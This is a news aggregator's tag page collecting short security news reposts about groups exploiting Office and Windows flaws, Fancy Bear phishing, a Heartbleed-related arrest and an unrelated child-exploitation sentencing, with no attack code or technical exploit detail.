exploiting

now browsing by tag

 
 

#cybersecurity | #hackerspace | Maze Ransomware Exploiting Exploit Kits

Source: National Cyber Security – Produced By Gregory Evans Cybercrime has never been one to hem in tactics with ideology or rules. Rather, malware operators are known to use what works and then modify code to continue to work. By “work,” we mean that the code does what it is supposed to; for information stealers, […] View full post on AmIHackerProof.com

A #Hacking Group Is #Already #Exploiting the #Office #Equation Editor #Bug

Source: National Cyber Security – Produced By Gregory Evans

A week after details about a severe Microsoft Office vulnerability came to light, at least one criminal group is now using it to infect users.

The group is not your regular spam botnet, but a top cyber-criminal operation known to security researchers as Cobalt, a hacking outfit that has targeted banks, ATM networks, and financial institutions for the past two years.

CVE-2017-11882 used by Cobalt hacking group

According to Reversing Labs, a UK-based cyber-security firm, the Cobalt group is now spreading RTF documents to high-value targets that are laced with exploits that take advantage of CVE-2017-11882.

This is a vulnerability in the Office Equation Editor component that allows an attacker to execute code on victims’ computers without user interaction.

You don’t need a grizzled veteran of the infosec community to tell you that a vulnerability with such results would be incredibly valuable for any cyber-criminal organization.

Besides the damage this vulnerability can do, Cobalt’s quick adoption of CVE-2017-11882 was most likely aided by the availability of four proof of concept (PoC) exploits that have been published online in the past week [1, 2, 3, 4].

According to Reversing Labs, the Cobalt is currently sending emails laced with a booby-trapped RTF file that would utilize a CVE-2017-11882 exploit to download and run additional malicious files. The infection chain would go through multiple steps, but in the end, it would download and load a malicious DLL file that has yet to be analyzed in more depth.

Proofpoint Matthew Mesa also saw the same emails, but saw a slightly different exploitation chain.

Cobalt has jumped on Microsoft bugs before

As for the Cobalt group, they have a history of jumping on Microsoft bugs as soon as they’re disclosed and weaponizing them for their campaigns. The same thing happened with CVE-2017-8759, a remote code execution vulnerability that affected the .NET Framework, patched by Microsoft in the September 2017 Patch Tuesday.

Security firms first started documenting the Cobalt group in 2016, when it was spotted hitting ATMs and financial institutions across Europe. The group then spread to targets in the Americas, and later also targeted Russian banks, using the ex-Soviet space as a testing ground for new attacks, before it moved to more wealthy targets elsewhere.

The group’s most well-known malware family is Cobalt Strike, named after an eponymous commercial penetration testing software because it uses some of its components.

Patch now, before vulnerability is exploited en masse

As we’ve seen in the past, it doesn’t take too long for a vulnerability to trickle down from professional cyber-criminal groups to spam botnet herders once public PoCs are available.

Users should apply Windows updates KB2553204, KB3162047, KB4011276, and KB4011262, included in the November 2017 Patch Tuesday, to guard against CVE-2017-11882 exploitation.

 

The post A #Hacking Group Is #Already #Exploiting the #Office #Equation Editor #Bug appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Fancy Bear #hackers are now #exploiting the #New York terror attack to #spread their #malware

Source: National Cyber Security – Produced By Gregory Evans

Fancy Bear #hackers are now #exploiting the #New York terror attack to #spread their #malware

As the US justice department forges ahead with its investigation into the Trump administration and any possible collusion with Russia, the Fancy Bear hackers continue refining their attacks against global targets. As part of their new phishing campaign, the hackers are capitalising on the recent New York terror attack, to trick users into clicking on malicious documents, which in turn infects systems with their malware.

The Kremlin-linked hackers first made headlines during the 2016 US presidential campaign and are now widely considered to have orchestrated the cyberattacks against the US Democratic Party. The cyberespionage group has since been actively involved in various campaigns over the past year, targeting organisations and individuals across the globe.

The Fancy Bears’ most recent campaign, uncovered by security researchers at McAfee, involves the use of a black malicious document, titled “IsisAttackInNewYork”, which when clicked drops the hackers’ first-stage reconnaissance malware dropper Seduploader. The implant collects basic data from infected PCs and profiles prospective victims. Once hackers determine some interest in the victim, the implant then drops Fancy Bears’ customised malware X-Agent or Sedreco.

The post Fancy Bear #hackers are now #exploiting the #New York terror attack to #spread their #malware appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Hackers Exploiting ‘Find My iPhone’ To Remotely Lock Mac Computers

Source: National Cyber Security – Produced By Gregory Evans

Apple’s Find My iPhone feature is meant to be a recovery feature of sorts, where if you’ve misplaced your iPhone, you will be able to locate it using the feature. Unfortunately it seems that in recent times, hackers have managed to exploit the feature and in turn have been locking…

The post Hackers Exploiting ‘Find My iPhone’ To Remotely Lock Mac Computers appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Smithton man to serve 30 years for sexually exploiting 6-year-old girl

A 40-year-old Smithton man was sentenced to 30 years in prison Friday for child pornography and sexual exploitation of a child.

A release from U.S. Attorney Donald Boyce’s office stated that Kyle Oberg was found to have taken 337 images of a 6-year-old girl engaging in sexually explicit behavior.

An investigation into Oberg was launched when the girl’s mother reported to the Smithton Police Department that the man was acting suspiciously.

On July 18, 2013, police searching Oberg’s home found evidence that between Dec. 8, 2012 and June 29, 2013 the man took 337 images on 24 separate occasions of the 6-year-old girl.

Read More

The post Smithton man to serve 30 years for sexually exploiting 6-year-old girl appeared first on Parent Security Online.

View full post on Parent Security Online

Google: hackers still exploiting Windows ‘critical’ flaw

security-1

Source: National Cyber Security – Produced By Gregory Evans

Google: hackers still exploiting Windows ‘critical’ flaw

Although Adobe has worked to fix flaws found by Google, Microsoft has yet to act
Google has warned that a zero-day vulnerability still exists in Windows, despite it being almost a week since Microsoft was first notified of the problem.

The post Google: hackers still exploiting Windows ‘critical’ flaw appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Hacker arrested by Canadan Police for exploiting HeartBleed Bug

A 19-year-old man is arrested and charged by Canadian police a who allegedly exploited the Heartbleed bug to steal personal data from the Canadian Revenue Agency’s website.

Stephen Arthuro Solis-Reyes, who allegedly grabbed 900 social insurance numbers (SINs) over a period of six hours, marks the first time that authorities have apprehended someone in relation to the bug in OpenSSL.

Solis-Reyes of London, Ontario is a student at Western University, was detained by the London Police Service and the Royal Canadian Mounted Police National Division Integrated Technological Crime Unit.

In a statement, Assistant Commissioner Gilles Michaud of the RCMP, said:
The RCMP treated this breach of security as a high priority case and mobilized the necessary resources to resolve the matter as quickly as possible. Investigators from National Division, along with our counterparts in “O” Division have been working tirelessly over the last four days analyzing data, following leads, conducting interviews, obtaining and executing legal authorizations and liaising with our partners.

He is scheduled to appear in court in Ottowa on 17 July 2014.

Canada’s tax agency was one of the first major organizations to be impacted by the Heartbleed flaw and subsequently had to remove public access to its online services for four days in order to protect taxpayer information.

It’s unclear what Solis-Reyes’s motivations were. But it’s important to remember that while security researchers and other interested parties may like to think that testing for Heartbleed or other vulnerabilities may be ethical and useful in purpose, the law may not agree.

Such activity may not be regulated in every nation, but some countries certainly do prohibit the testing of security on third-party websites without permission.

Furthermore, it should be obvious that actually exploiting any discovered vulnerabilities in order to gain unauthorized access to networks and data is a bad idea at all times. More so if the organization in question is your national tax office.

If you do have legitimate concerns about a website’s security, the correct course of action would be to notify the owners and engage in responsible disclosure in a manner that doesn’t place other people’s data at jeopardy.

Source: http://whogothack.blogspot.co.uk/2014/04/hacker-arrested-by-canadan-police-for.html#.VjacTfmqqko

The post Hacker arrested by Canadan Police for exploiting HeartBleed Bug appeared first on Am I Hacker Proof.

View full post on Am I Hacker Proof